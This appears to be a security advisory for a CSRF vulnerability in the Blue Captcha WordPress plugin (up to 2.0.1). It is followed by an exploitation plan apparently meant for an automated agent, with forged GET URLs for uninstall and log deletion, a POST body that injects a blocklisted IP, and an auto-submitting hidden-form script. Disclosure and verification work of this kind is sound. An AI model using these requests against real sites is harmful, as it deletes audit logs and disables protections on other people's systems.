Blue Captcha <= 2.0.1 - Cross-Site Request Forgery via 'blcap_action' Parameter
Description
The Blue Captcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 2.0.1. This is due to missing or incorrect nonce validation on the main admin panel (blcap_main_page) and on the Hall of Shame and Log subpages, which accept a 'blcap_action' / 'action' parameter from $_REQUEST and perform destructive operations (plugin uninstall via blcap_uninstall(), log deletion via blcap_delete_logs(), Hall of Shame deletion via blcap_delete_ip_db(), and adding IPs to the banned list via update_option('blcap_settings')) with no wp_verify_nonce(), check_admin_referer(), or check_ajax_referer() calls anywhere in the codebase. This makes it possible for unauthenticated attackers to uninstall the plugin, delete audit logs, remove Hall of Shame entries, and add arbitrary IP addresses to the block list via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
# Exploitation Research Plan: CVE-2026-10552 (Blue Captcha CSRF) This plan outlines the technical steps required to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Blue Captcha plugin (<= 2.0.1). ## 1. Vulnerability Summary The Blue Captcha plugin fails to implement nonce verific…
Show full research plan
Exploitation Research Plan: CVE-2026-10552 (Blue Captcha CSRF)
This plan outlines the technical steps required to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Blue Captcha plugin (<= 2.0.1).
1. Vulnerability Summary
The Blue Captcha plugin fails to implement nonce verification on its administrative interfaces. Destructive operations—including plugin uninstallation, log deletion, and IP blacklisting—are triggered via the blcap_action or action parameters within the $_REQUEST superglobal. Because the plugin does not check for a valid WordPress nonce or verify the request origin (via check_admin_referer), an attacker can trick an authenticated administrator into performing these actions by enticing them to visit a malicious URL or submit a hidden form.
2. Attack Vector Analysis
- Vulnerable Endpoint:
/wp-admin/admin.php(specifically when thepageparameter is set to the plugin's menu slug, likelyblue-captcha). - Action Parameter:
blcap_actionoraction(retrieved via$_REQUEST). - Authentication Level: Requires an active session of a user with
manage_optionscapabilities (typically an Administrator). - Preconditions: The victim must be logged into the WordPress dashboard and interact with the attacker's forged request (e.g., clicking a link or loading a page with an auto-submitting form).
3. Code Flow (Inferred)
- Entry Point: The plugin registers an admin menu page via
add_menu_page()oradd_submenu_page()in a function hooked toadmin_menu. - Controller Logic: The callback function for the main admin page (referenced as
blcap_main_pagein the description) likely contains a conditional block:// Inferred logic based on vulnerability description if ( isset( $_REQUEST['blcap_action'] ) ) { $action = $_REQUEST['blcap_action']; if ( $action == 'uninstall' ) { blcap_uninstall(); } elseif ( $action == 'delete_logs' ) { blcap_delete_logs(); } // ... and so on } - Sink: Functions like
blcap_uninstall(),blcap_delete_logs(), andblcap_delete_ip_db()are called directly without anywp_verify_nonce()orcurrent_user_can()checks inside the action-handling logic.
4. Nonce Acquisition Strategy
According to the vulnerability description, there are no nonce checks implemented for these actions.
- Nonce Status: Not Required.
- Bypass: The vulnerability exists because the security control is entirely absent. No acquisition from the DOM or JS variables is necessary to execute the state-changing request.
5. Exploitation Strategy
The goal is to demonstrate that an unauthenticated attacker can force an administrator to trigger the blcap_uninstall() function via CSRF.
Step 1: Trigger Plugin Uninstall
The attacker crafts a URL that, when loaded by the admin, triggers the uninstallation.
- Tool:
http_request - Method:
GET(Since$_REQUESTis used, GET is typically sufficient and easier to exploit via simple links or tags). - URL:
http://[target-site]/wp-admin/admin.php?page=blue-captcha&blcap_action=uninstall - Headers:
Cookie: [Admin Session Cookies] (Simulated in the agent's browser environment).
Step 2: Clear Hall of Shame (Alternative Action)
- Method:
GET - URL:
http://[target-site]/wp-admin/admin.php?page=blue-captcha&blcap_action=delete_ip_db
Step 3: Add Arbitrary IP to Blocklist
The description mentions update_option('blcap_settings') is vulnerable. This likely requires a POST request to mimic a settings save.
- Method:
POST - URL:
http://[target-site]/wp-admin/admin.php?page=blue-captcha - Content-Type:
application/x-www-form-urlencoded - Body:
blcap_action=update_settings&blcap_settings[banned_ips]=13.37.13.37(Structure inferred;blcap_settingsis the option name mentioned).
6. Test Data Setup
Before exploitation, ensure the environment is populated:
- Activate Plugin:
wp plugin activate blue-captcha - Generate Logs: Perform several failed login attempts to populate the "Log" subpage.
- Populate Hall of Shame: Manually add an IP or use
wp option update blcap_settings ...to ensure the database has data to delete. - Identify Slug: Verify the admin page slug using
wp admin-menu list | grep Blue.
7. Expected Results
- Uninstall Action: The plugin should be deactivated and its data (options) removed from the
wp_optionstable. The user might be redirected to the main plugins page. - Log Deletion: Navigating to the Blue Captcha log page should show "No logs found" or an empty table.
- IP Blocklist: The
blcap_settingsoption in the database should reflect the attacker-supplied IP address.
8. Verification Steps
After sending the HTTP requests, verify the impact via WP-CLI:
- Check Plugin Status:
wp plugin is-active blue-captcha
(Expected: Failure/Not active if uninstall was triggered) - Check Banned IPs:
wp option get blcap_settings
(Expected: Presence of the injected IP address) - Check Logs Table (if custom table used):
wp db query "SELECT COUNT(*) FROM wp_blcap_logs"(Table name inferred)
(Expected: 0)
9. Alternative Approaches
- Action Parameter Variations: If
blcap_actionfails, attempt using the standard WordPressactionparameter:admin.php?page=blue-captcha&action=uninstall. - Request Method Enforcement: If the server or plugin enforces POST, use
browser_evalto create and submit a hidden form programmatically:const form = document.createElement('form'); form.method = 'POST'; form.action = '/wp-admin/admin.php?page=blue-captcha'; const input = document.createElement('input'); input.name = 'blcap_action'; input.value = 'uninstall'; form.appendChild(input); document.body.appendChild(form); form.submit(); - Subpage Targeting: If the main page doesn't handle the action, target the subpages mentioned:
admin.php?page=blcap_logs&blcap_action=delete_logs.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.